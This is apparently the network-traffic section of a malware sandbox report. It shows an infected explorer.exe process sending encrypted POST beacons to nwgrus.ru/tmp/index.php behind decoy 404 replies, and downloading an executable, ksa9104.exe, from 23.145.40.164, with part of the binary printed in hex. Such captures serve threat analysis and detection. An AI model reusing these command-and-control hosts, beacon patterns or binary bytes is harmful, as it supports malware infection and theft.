                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          26192.168.2.550002190.224.203.37801028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 3, 2024 23:28:04.747276068 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://cweiuociftg.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 274
                                                                                          Host: nwgrus.ru
                                                                                          Oct 3, 2024 23:28:04.747324944 CEST274OUTData Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 54 0b ae 88
                                                                                          Data Ascii: ;nRQqs~yctzDbW+lV?#1|J7 M@NA -[k,vuTiZX}[xjgf9vX@i[vzDOpt(n\X@%x!@0TD VUqfvx?t{lO&/
                                                                                          Oct 3, 2024 23:28:06.105165005 CEST484INHTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.26.0
                                                                                          Date: Thu, 03 Oct 2024 21:28:05 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          27192.168.2.550003190.224.203.37801028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 3, 2024 23:28:06.115504026 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://ncmvgkvwguax.org/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 181
                                                                                          Host: nwgrus.ru
                                                                                          Oct 3, 2024 23:28:06.115504026 CEST181OUTData Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 38 01 e1 fb
                                                                                          Data Ascii: ;nRQqs~yctzDbW+lV?#1|J7 M@NA -[k,vu8>Wcg*JDLxWk;;Ij`3"I/<2^Y|B#p,R^aSLc
                                                                                          Oct 3, 2024 23:28:07.783315897 CEST484INHTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.26.0
                                                                                          Date: Thu, 03 Oct 2024 21:28:07 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          28192.168.2.550022190.224.203.37801028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 3, 2024 23:29:16.018275023 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://trelswnfdtmn.org/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 130
                                                                                          Host: nwgrus.ru
                                                                                          Oct 3, 2024 23:29:16.018275023 CEST130OUTData Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5c 41 eb a8
                                                                                          Data Ascii: ;nRQqs~yctzDbW+lV?#1|J7 M@NA .[k,vu\Af)zwweDg) -^E#5`Z3
                                                                                          Oct 3, 2024 23:29:17.365068913 CEST151INHTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.26.0
                                                                                          Date: Thu, 03 Oct 2024 21:29:17 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close
                                                                                          Data Raw: 03 00 00 00 72 e8 84
                                                                                          Data Ascii: r


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          29192.168.2.550023190.224.203.37801028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 3, 2024 23:29:22.479424953 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://mltvlrabpgii.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 226
                                                                                          Host: nwgrus.ru
                                                                                          Oct 3, 2024 23:29:22.479453087 CEST226OUTData Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 55 39 cc 9e
                                                                                          Data Ascii: ;nRQqs~yctzDbW+lV?#1|J7 M@NA .[k,vuU93pA2UrlxccM8%u5I#n<*,f.\X7X:"x(,;(7[RO7
                                                                                          Oct 3, 2024 23:29:23.861526012 CEST151INHTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.26.0
                                                                                          Date: Thu, 03 Oct 2024 21:29:23 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close
                                                                                          Data Raw: 03 00 00 00 72 e8 84
                                                                                          Data Ascii: r


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          30192.168.2.550024190.224.203.37801028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 3, 2024 23:29:30.838433027 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://wfqqxnqsmcop.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 251
                                                                                          Host: nwgrus.ru
                                                                                          Oct 3, 2024 23:29:30.838433027 CEST251OUTData Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5f 33 ee 80
                                                                                          Data Ascii: ;nRQqs~yctzDbW+lV?#1|J7 M@NA .[k,vu_3_.wy{#s}DE6`\6kt>^T1_HcI>~G%*w_7btw:.3*cZr[ymwo8=
                                                                                          Oct 3, 2024 23:29:32.215879917 CEST151INHTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.26.0
                                                                                          Date: Thu, 03 Oct 2024 21:29:31 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close
                                                                                          Data Raw: 03 00 00 00 72 e8 84
                                                                                          Data Ascii: r


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          31192.168.2.550025190.224.203.37801028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 3, 2024 23:29:42.053097963 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://gottjuiosjatm.org/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 281
                                                                                          Host: nwgrus.ru
                                                                                          Oct 3, 2024 23:29:42.053114891 CEST281OUTData Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4b 20 e2 8b
                                                                                          Data Ascii: ;nRQqs~yctzDbW+lV?#1|J7 M@NA .[k,vuK dCXPkO?1*W@d|G$@7NN:Nob:B'h7hGE:[/:q>_]vZVor{`E?m
                                                                                          Oct 3, 2024 23:29:43.489607096 CEST151INHTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.26.0
                                                                                          Date: Thu, 03 Oct 2024 21:29:43 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close
                                                                                          Data Raw: 03 00 00 00 72 e8 84
                                                                                          Data Ascii: r


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          32192.168.2.550026190.224.203.37801028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 3, 2024 23:29:53.007772923 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://sgntleolvdwaddkp.com/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 195
                                                                                          Host: nwgrus.ru
                                                                                          Oct 3, 2024 23:29:53.007807970 CEST195OUTData Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 31 21 de 99
                                                                                          Data Ascii: ;nRQqs~yctzDbW+lV?#1|J7 M@NA .[k,vu1!PE][;gvapUSW5#\EWVUJhC2.E&^(U*e/
                                                                                          Oct 3, 2024 23:29:54.424612045 CEST151INHTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.26.0
                                                                                          Date: Thu, 03 Oct 2024 21:29:54 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close
                                                                                          Data Raw: 03 00 00 00 72 e8 84
                                                                                          Data Ascii: r


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          33192.168.2.550028187.131.253.169801028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 3, 2024 23:30:10.966243029 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://jevspcjflxdrnyqd.com/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 129
                                                                                          Host: nwgrus.ru
                                                                                          Oct 3, 2024 23:30:10.966279984 CEST129OUTData Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7f 26 e9 8c
                                                                                          Data Ascii: ;nRQqs~yctzDbW+lV?#1|J7 M@NA .[k,vu&XvGp:Z*T%uX^
                                                                                          Oct 3, 2024 23:30:12.046080112 CEST151INHTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.26.0
                                                                                          Date: Thu, 03 Oct 2024 21:30:11 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close
                                                                                          Data Raw: 03 00 00 00 72 e8 84
                                                                                          Data Ascii: r


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          34192.168.2.550030187.131.253.169801028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 3, 2024 23:30:31.897259951 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://xvjdoetwalpqj.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 153
                                                                                          Host: nwgrus.ru
                                                                                          Oct 3, 2024 23:30:31.897284031 CEST153OUTData Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 40 35 e2 94
                                                                                          Data Ascii: ;nRQqs~yctzDbW+lV?#1|J7 M@NA .[k,vu@5^/hQh$SQTV16hZdIx1dm5IvA:@
                                                                                          Oct 3, 2024 23:30:33.007349014 CEST151INHTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.26.0
                                                                                          Date: Thu, 03 Oct 2024 21:30:32 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close
                                                                                          Data Raw: 03 00 00 00 72 e8 84
                                                                                          Data Ascii: r


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          35192.168.2.550032187.131.253.169801028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 3, 2024 23:30:44.688546896 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://rsomhlsnqixrhe.org/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 223
                                                                                          Host: nwgrus.ru
                                                                                          Oct 3, 2024 23:30:44.688580990 CEST223OUTData Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3a 38 ca b9
                                                                                          Data Ascii: ;nRQqs~yctzDbW+lV?#1|J7 M@NA .[k,vu:8}oN%1uqMe,,eAJA/)M[Aqk3aB^Uc!)tayCt
                                                                                          Oct 3, 2024 23:30:45.768537998 CEST151INHTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.26.0
                                                                                          Date: Thu, 03 Oct 2024 21:30:45 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close
                                                                                          Data Raw: 03 00 00 00 72 e8 84
                                                                                          Data Ascii: r


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          0192.168.2.55000023.145.40.1644431028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-03 21:28:02 UTC162OUTGET /ksa9104.exe HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Host: 23.145.40.164
                                                                                          2024-10-03 21:28:02 UTC327INHTTP/1.1 200 OK
                                                                                          Date: Thu, 03 Oct 2024 21:28:02 GMT
                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Last-Modified: Thu, 03 Oct 2024 21:00:03 GMT
                                                                                          ETag: "61200-62398d6a09e32"
                                                                                          Accept-Ranges: bytes
                                                                                          Content-Length: 397824
                                                                                          Connection: close
                                                                                          Content-Type: application/x-msdos-program
                                                                                          2024-10-03 21:28:02 UTC7865INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 08 a9 7f 91 4c c8 11 c2 4c c8 11 c2 4c c8 11 c2 23 be 8f c2 56 c8 11 c2 23 be ba c2 6a c8 11 c2 23 be bb c2 2f c8 11 c2 45 b0 82 c2 4b c8 11 c2 4c c8 10 c2 ce c8 11 c2 23 be be c2 4d c8 11 c2 23 be 8b c2 4d c8 11 c2 23 be 8c c2 4d c8 11 c2 52 69 63 68 4c c8 11 c2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 51 37 ad 64 00 00 00
                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$LLL#V#j#/EKL#M#M#MRichLPELQ7d
                                                                                          2024-10-03 21:28:02 UTC8000INData Raw: 88 47 03 8a 46 02 c1 e9 02 88 47 02 83 ee 02 83 ef 02 83 f9 08 72 88 fd f3 a5 fc ff 24 95 7c 2b 40 00 90 8a 46 03 23 d1 88 47 03 8a 46 02 88 47 02 8a 46 01 c1 e9 02 88 47 01 83 ee 03 83 ef 03 83 f9 08 0f 82 56 ff ff ff fd f3 a5 fc ff 24 95 7c 2b 40 00 8d 49 00 30 2b 40 00 38 2b 40 00 40 2b 40 00 48 2b 40 00 50 2b 40 00 58 2b 40 00 60 2b 40 00 73 2b 40 00 8b 44 8e 1c 89 44 8f 1c 8b 44 8e 18 89 44 8f 18 8b 44 8e 14 89 44 8f 14 8b 44 8e 10 89 44 8f 10 8b 44 8e 0c 89 44 8f 0c 8b 44 8e 08 89 44 8f 08 8b 44 8e 04 89 44 8f 04 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95 7c 2b 40 00 8b ff 8c 2b 40 00 94 2b 40 00 a4 2b 40 00 b8 2b 40 00 8b 45 08 5e 5f c9 c3 90 8a 46 03 88 47 03 8b 45 08 5e 5f c9 c3 8d 49 00 8a 46 03 88 47 03 8a 46 02 88 47 02 8b 45 08 5e 5f c9 c3 90
                                                                                          Data Ascii: GFGr$|+@F#GFGFGV$|+@I0+@8+@@+@H+@P+@X+@`+@s+@DDDDDDDDDDDDDD$|+@+@+@+@+@E^_FGE^_IFGFGE^_
                                                                                          2024-10-03 21:28:02 UTC8000INData Raw: 10 dd 5d e0 dd 01 8d 4d d8 dd 5d e8 51 dd 06 dd 5d f0 ff d0 59 85 c0 0f 85 d2 01 00 00 e8 cc fe ff ff c7 00 22 00 00 00 e9 c2 01 00 00 c7 45 dc 8c ed 40 00 8b 4d 08 dd 01 8b 4d 0c 8b 75 10 dd 5d e0 dd 01 8d 4d d8 dd 5d e8 51 dd 06 c7 45 d8 04 00 00 00 dd 5d f0 ff d0 59 e9 90 01 00 00 c7 45 d8 03 00 00 00 c7 45 dc 8c ed 40 00 eb 87 c7 45 dc 84 ed 40 00 8b 4d 08 8b 75 10 dd 01 8b 4d 0c dd 5d e0 dd 01 dd 5d e8 dd 06 e9 3f 01 00 00 89 55 d8 c7 45 dc 84 ed 40 00 e9 57 ff ff ff c7 45 dc 80 ed 40 00 eb ce 89 55 d8 c7 45 dc 80 ed 40 00 e9 3f ff ff ff c7 45 dc 90 ed 40 00 e9 71 ff ff ff 83 e9 1a 74 57 49 74 48 49 74 39 49 74 20 83 e9 1d 74 12 83 e9 03 0f 85 15 01 00 00 c7 45 dc 78 ed 40 00 eb 8e c7 45 dc 70 ed 40 00 eb 85 c7 45 dc 90 ed 40 00 8b 4d 08 dd 01 8b 75
                                                                                          Data Ascii: ]M]Q]Y"E@MMu]M]QE]YEE@E@MuM]]?UE@WE@UE@?E@qtWItHIt9It tEx@Ep@E@Mu
                                                                                          2024-10-03 21:28:02 UTC8000INData Raw: d2 83 c7 04 39 1d f4 e8 44 00 7c a2 eb 06 8b 1d f4 e8 44 00 33 ff 85 db 7e 72 8b 45 f8 8b 00 83 f8 ff 74 5c 83 f8 fe 74 57 8b 4d fc 8a 09 f6 c1 01 74 4d f6 c1 08 75 0b 50 ff 15 a0 e1 40 00 85 c0 74 3d 8b f7 83 e6 1f 8b c7 c1 f8 05 c1 e6 06 03 34 85 00 e9 44 00 8b 45 f8 8b 00 89 06 8b 45 fc 8a 00 88 46 04 68 a0 0f 00 00 8d 46 0c 50 ff 15 78 e1 40 00 85 c0 0f 84 bc 00 00 00 ff 46 08 83 45 f8 04 47 ff 45 fc 3b fb 7c 8e 33 db 8b f3 c1 e6 06 03 35 00 e9 44 00 8b 06 83 f8 ff 74 0b 83 f8 fe 74 06 80 4e 04 80 eb 71 c6 46 04 81 85 db 75 05 6a f6 58 eb 0a 8d 43 ff f7 d8 1b c0 83 c0 f5 50 ff 15 00 e1 40 00 8b f8 83 ff ff 74 42 85 ff 74 3e 57 ff 15 a0 e1 40 00 85 c0 74 33 25 ff 00 00 00 89 3e 83 f8 02 75 06 80 4e 04 40 eb 09 83 f8 03 75 04 80 4e 04 08 68 a0 0f 00 00
                                                                                          Data Ascii: 9D|D3~rEt\tWMtMuP@t=4DEEFhFPx@FEGE;|35DttNqFujXCP@tBt>W@t3%>uN@uNh
